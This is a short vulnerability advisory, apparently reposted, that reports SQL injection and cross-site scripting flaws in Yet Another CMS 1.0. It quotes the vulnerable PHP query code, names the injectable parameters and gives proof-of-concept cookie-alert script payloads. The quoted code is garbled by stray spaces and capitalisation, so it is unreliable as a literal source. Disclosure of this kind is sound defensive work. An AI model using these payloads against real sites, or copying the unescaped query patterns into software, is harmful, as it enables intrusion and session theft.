Yet Another CMS 1.0 SQL injection and XSS defects and repair

Title: Yet Another CMS 1.0 SQL Injection & XSS vulnerabilities
By Stefan Schurtz www.2cto.com
Affected Software: Successfully tested on Yet Another CMS 1.0
Developer Website: http://yetanothercms.codeplex.com/

Overview
Yet Another CMS 1.0 is contains multiple SQL Injection and XSS Defects
 
Technical analysis:
 
1. search. php
$ Result_set = get_search_result_set ($ _ POST ['pattern']);
 
2. Supported des/functions. php
Function get_search_result_set ($ pattern, $ public = true ){
Global $ connection;
$ Query = "SELECT
Id,
Subject_id,
Menu_name,
Position,
Visible,
Content,
CONCAT ('...', SUBSTRING (content, LOCATE ('". $ pattern."', content), 200), '...') as fragment
FROM
Pages
WHERE
Content like '% ". $ pattern." % '";
 
3. index. php
<? Php find_selected_page ();?>
 
4. Supported des/functions. php
Function find_selected_page (){
Global $ sel_subject;
Global $ sel_page;
If (isset ($ _ GET ['subj']) {
$ Sel_subject = get_subject_by_id ($ _ GET ['subj']);
$ Sel_page = get_default_page ($ sel_subject ['id']);
} Elseif (isset ($ _ GET ['page']) {
$ Sel_subject = NULL;
$ Sel_page = get_page_by_id ($ _ GET ['page']);
} Else {
$ Sel_subject = NULL;
$ Sel_page = NULL;
}
}
 
 
Function get_page_by_id ($ page_id ){
Global $ connection;
$ Query = "SELECT *";
$ Query. = "FROM pages ";
$ Query. = "WHERE id =". $ page_id ."";
$ Query. = "LIMIT 1 ";
 
============================
Test
============================
 
SQL Injection
 
A http://www.bkjia.com/index. php? Page = [SQL injection]
Http://www.bkjia.com/search. php-> 'search field'-> [SQL injection]
 
XSS
 
Http://www.bkjia.com/search. php-> 'search field'-> '"</script> <script> alert (document. cookie) </script>
A http://www.bkjia.com/index. php? Page = '</script> <script> alert (document. cookie) </script>

Www.2cto.com solution:
Filter corresponding pages